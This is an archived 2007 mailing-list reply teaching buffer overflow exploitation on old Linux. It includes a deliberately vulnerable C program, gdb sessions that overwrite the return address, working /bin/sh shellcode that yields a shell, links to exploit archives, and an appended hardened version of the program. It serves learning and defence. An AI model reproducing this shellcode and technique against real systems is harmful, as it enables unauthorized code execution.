Vulnerability Development mailing list archives
Re: Learning buffer overflow help
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Thu, 7 Jun 2007 11:39:44 +0200 (CEST)
Hey Eric,

On Wed, 6 Jun 2007, erk_3 () hotmail com wrote:

> Hello everyone, I have studied a lot on buffer overflows and I understand the theory behind it. Thing is, any example I follow says once you can overwrite the EIP you can control the flow of the program (in a nutshell).
> [snip]

I guess you're missing something basic here... Take a look at the following example:
nobody@slack10:/tmp$ cat /etc/slackware-version
Slackware 10.2.0
nobody@slack10:/tmp$ uname -a
Linux slack10 2.4.31 #6 Sun Jun 5 19:04:47 PDT 2005 i686 unknown unknown GNU/Linux

nobody@slack10:/tmp$ cat > vuln.c
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[])
{
    char name[4];
    strcpy(name, argv[1]);
    printf(name); /* there's a pretty format string bug here too;) */
}
nobody@slack10:/tmp$ make vuln
cc vuln.c -o vuln
nobody@slack10:/tmp$ gdb -q ./vuln
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r 1234AAAABBBB
Starting program: /tmp/vuln 1234AAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So far, so good. Now, to overwrite the %eip with an arbitrary valid address, you should do something like that instead:

(gdb) r `printf "1234AAAA\xee\xee\xff\xbf"`
Starting program: /tmp/vuln `printf "1234AAAA\xee\xee\xff\xbf"`

Program received signal SIGILL, Illegal instruction.
0xbfffeeee in ?? ()

Finally, to actually exploit the overflow to run an arbitrary shellcode:

nobody@slack10:/tmp$ export SC=`printf "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"`
[...]
(gdb) x/s 0xbfffff73
0xbfffff73:      "SC=1Ph//shh/bin\211PS\211\231\v\200"
(gdb) x/s 0xbfffff76
0xbfffff76:      "1Ph//shh/bin\211PS\211\231\v\200"
(gdb) r `printf "1234AAAA\x76\xff\xff\xbf"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln `printf "1234AAAA\x76\xff\xff\xbf"`

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-3.00$

This is what happens on a kinda old system based on Linux kernel 2.4, without additional protections. YMMV on newer platforms...
You may also want to check out some exploitation examples here:

http://www.0xdeadbeef.info/code/abo-exploits.tgz
http://www.0xdeadbeef.info/code/fs-exploits.tgz
http://www.0xdeadbeef.info/code/vulndev-exploits.tgz
http://www.0xdeadbeef.info/code/linux-x86-exploits.tgz
http://www.0xdeadbeef.info/code/solaris-sparc-exploits.tgz

Cheers,

--
Marco Ivaldi
Antifork Research, Inc.
http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
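As an added example that is not part of the list post or its author's code: the hardened counterpart of the vuln.c above, which bounds the copy to the 4-byte buffer (so an overlong argument is truncated instead of overwriting the saved return address) and prints the input as data rather than as the format string. The function names copy_bounded, store_name and print_name are assumptions made here.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical hardened version of the post's vuln.c (added example).
 * The original strcpy()s argv[1] into name[4] and then calls printf(name),
 * so a 12-byte argument lands on the saved %eip and the string doubles as
 * a format string. Here both defects are closed. */

#define NAME_LEN 4  /* same tiny buffer as the post's name[4] */

/* Bounded copy: stores at most dstlen-1 bytes, always NUL-terminates,
 * reports how many bytes were stored and returns true if src was cut.
 * Written out rather than using strlcpy() so it builds on plain glibc. */
static bool copy_bounded(char *dst, size_t dstlen, const char *src,
                         size_t *copied)
{
    if (dstlen == 0) { if (copied) *copied = 0; return true; }
    size_t srclen = strlen(src);
    size_t n = srclen < dstlen - 1 ? srclen : dstlen - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    if (copied) *copied = n;
    return srclen > n;
}

/* Returns the number of bytes stored in out and flags truncation. */
int store_name(const char *input, char *out, size_t outlen, bool *truncated)
{
    size_t copied;
    *truncated = copy_bounded(out, outlen, input, &copied);
    return (int)copied;
}

/* Untrusted data is always an argument, never the format itself. */
void print_name(const char *name)
{
    printf("%s\n", name);
}

int main(int argc, char *argv[])
{
    char name[NAME_LEN];
    bool truncated;
    if (argc < 2) { fprintf(stderr, "usage: %s <name>\n", argv[0]); return 1; }
    int n = store_name(argv[1], name, sizeof name, &truncated);
    if (truncated) fprintf(stderr, "input truncated to %d bytes\n", n);
    print_name(name);
    return 0;
}
```

Built with the same `cc vuln.c -o vuln` line, the 1234AAAABBBB run from the post now prints "123" and a truncation notice instead of faulting at 0x42424242.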